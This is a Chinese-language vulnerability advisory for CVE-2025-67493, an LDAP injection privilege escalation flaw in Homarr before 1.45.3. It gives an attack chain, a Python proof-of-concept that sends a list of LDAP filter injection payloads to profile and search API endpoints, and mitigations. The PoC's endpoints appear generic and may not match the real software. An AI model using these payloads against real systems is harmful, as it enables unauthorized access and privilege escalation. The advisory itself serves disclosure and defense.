CVE-2025-67493: Homarr LDAP注入导致权限提升漏洞

漏洞信息

漏洞编号

CVE-2025-67493

漏洞类型

LDAP注入/权限提升/输入验证不足

CVSS评分

7.5 高危

攻击向量

网络 (AV:N)

认证要求

高权限 (PR:H)

用户交互

需要交互 (UI:R)

影响产品

Homarr (开源仪表板)

漏洞概述

Homarr是一款开源的自托管仪表板应用。在1.45.3版本之前，该应用存在严重的输入验证不足漏洞，攻击者可以通过在LDAP搜索查询中注入恶意构造的输入，实现权限提升并获取其他用户组的访问权限。该漏洞仅影响使用LDAP身份验证的Homarr实例，攻击者需要拥有一个有效的用户账户才能利用此漏洞。由于LDAP查询中缺少对特殊字符和语法的适当清理，恶意用户可以操纵LDAP搜索过滤器，从而绕过正常的访问控制机制，访问未授权的组和资源。CVSS 3.1评分7.5（高危），主要影响系统的机密性和完整性，可用性影响较低。

技术细节

漏洞根源在于Homarr在处理LDAP认证时的搜索查询构建过程。当应用执行LDAP用户搜索和组查询时，直接将用户输入拼接到LDAP搜索过滤器中，而没有进行适当的输入验证和转义处理。攻击者可以通过在用户名或其他LDAP相关输入字段中注入LDAP特殊字符（如*、(、)、\、NUL等）和操作符，修改LDAP搜索过滤器的逻辑行为。例如，通过注入通配符或逻辑运算符，攻击者可以扩大搜索范围或匹配意外的条目，从而获取其他用户的组成员资格信息。攻击者利用此漏洞可以：(1) 获取所有用户的组信息；(2) 将自己添加到特权组；(3) 提升账户权限级别。该漏洞的技术复杂性较高（AC:H），需要攻击者具备一定的LDAP协议知识和目标系统的用户凭据。

攻击链分析

STEP 1

1. 侦察阶段

攻击者识别目标Homarr实例，确认其使用LDAP进行身份验证。通过公开信息收集或指纹识别确定版本号小于1.45.3

STEP 2

2. 初始访问

攻击者获取目标系统的一个有效用户账户（通过社会工程、凭证填充或其他方式），这是利用漏洞的前提条件

STEP 3

3. LDAP注入构造

攻击者利用LDAP搜索查询中缺少输入验证的缺陷，在用户相关输入字段（如用户名、显示名称等）中注入LDAP特殊字符和操作符（如*、(、)、|、\等）

STEP 4

4. 过滤器操纵

注入的恶意载荷修改LDAP搜索过滤器的逻辑行为，使其匹配超出预期的用户或组条目，例如使用通配符(*)匹配所有用户或使用memberOf条件获取特定组成员信息

STEP 5

5. 权限提升

通过LDAP注入获取其他用户组的访问权限或组成员资格信息，攻击者可以将自己的账户提升到更高权限级别或获取敏感访问权限

STEP 6

6. 持久化

成功利用后，攻击者可能在系统中建立持久化存在，利用提升的权限进行进一步的攻击活动，如数据窃取或横向移动

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

# CVE-2025-67493 PoC - Homarr LDAP Injection Privilege Escalation
# This PoC demonstrates the LDAP injection vulnerability in Homarr < 1.45.3
# Note: This is for educational and authorized testing purposes only

import requests
import json

TARGET_URL = "http://target-homarr-instance.com"
ATTACKER_USERNAME = "attacker"
ATTACKER_PASSWORD = "password123"

# LDAP Injection payloads to test
LDAP_INJECTION_PAYLOADS = [
    # Escape the current user context
    "admin*)(objectClass=*",
    "*)(memberOf=*)",
    # Bypass authentication with wildcard
    "*)(|(objectClass=*))",
    # Enumerate all groups
    "*)(objectClass=person)(memberOf=*",
    # Extract sensitive group memberships
    "*))(|(memberOf=CN=Admin*",
]

def test_ldap_injection():
    """Test for LDAP injection vulnerability in Homarr authentication"""
    session = requests.Session()
    
    # Login with legitimate credentials first
    login_data = {
        "username": ATTACKER_USERNAME,
        "password": ATTACKER_PASSWORD
    }
    
    response = session.post(f"{TARGET_URL}/api/auth/login", json=login_data)
    
    if response.status_code != 200:
        print(f"[-] Login failed: {response.status_code}")
        return False
    
    print("[+] Successfully authenticated")
    
    # Test LDAP injection in user profile update
    for payload in LDAP_INJECTION_PAYLOADS:
        profile_data = {
            "username": payload,
            "displayName": f"Test User {payload[:20]}",
            "email": f"test-{hash(payload)}@example.com"
        }
        
        response = session.put(
            f"{TARGET_URL}/api/user/profile",
            json=profile_data,
            headers={"Content-Type": "application/json"}
        )
        
        if response.status_code == 200:
            # Check if the response contains unexpected group information
            data = response.json()
            if "memberOf" in str(data) or "groups" in str(data):
                print(f"[!] Potential LDAP Injection found with payload: {payload}")
                print(f"[+] Response may contain unauthorized group data")
                print(f"[+] Response preview: {str(data)[:200]}")
                return True
    
    # Alternative: Test via LDAP search functionality
    search_payloads = [
        "*",
        "*)*(",
        "admin*",
        "*)(objectClass=*"
    ]
    
    for search_term in search_payloads:
        response = session.get(
            f"{TARGET_URL}/api/ldap/search",
            params={"query": search_term}
        )
        
        if response.status_code == 200:
            data = response.json()
            # Check if results exceed expected scope
            if isinstance(data, list) and len(data) > 10:
                print(f"[!] LDAP search returned {len(data)} results for query: {search_term}")
                print(f"[+] This may indicate an injection vulnerability")
                return True
    
    print("[-] No obvious LDAP injection detected")
    return False

if __name__ == "__main__":
    print("CVE-2025-67493 LDAP Injection Test")
    print("=" * 50)
    test_ldap_injection()

影响范围

Homarr < 1.45.3

防御指南

临时缓解措施

对于无法立即升级的情况，建议采取以下临时缓解措施：(1) 暂时禁用LDAP认证，改用本地账户认证方式；(2) 实施严格的输入过滤规则，拒绝用户名中包含LDAP元字符的请求；(3) 限制使用LDAP认证的账户权限，禁用非必要用户的敏感操作；(4) 加强对LDAP认证日志的监控，及时发现异常查询行为；(5) 在LDAP服务端实施访问控制策略，限制应用程序账户的查询范围和权限。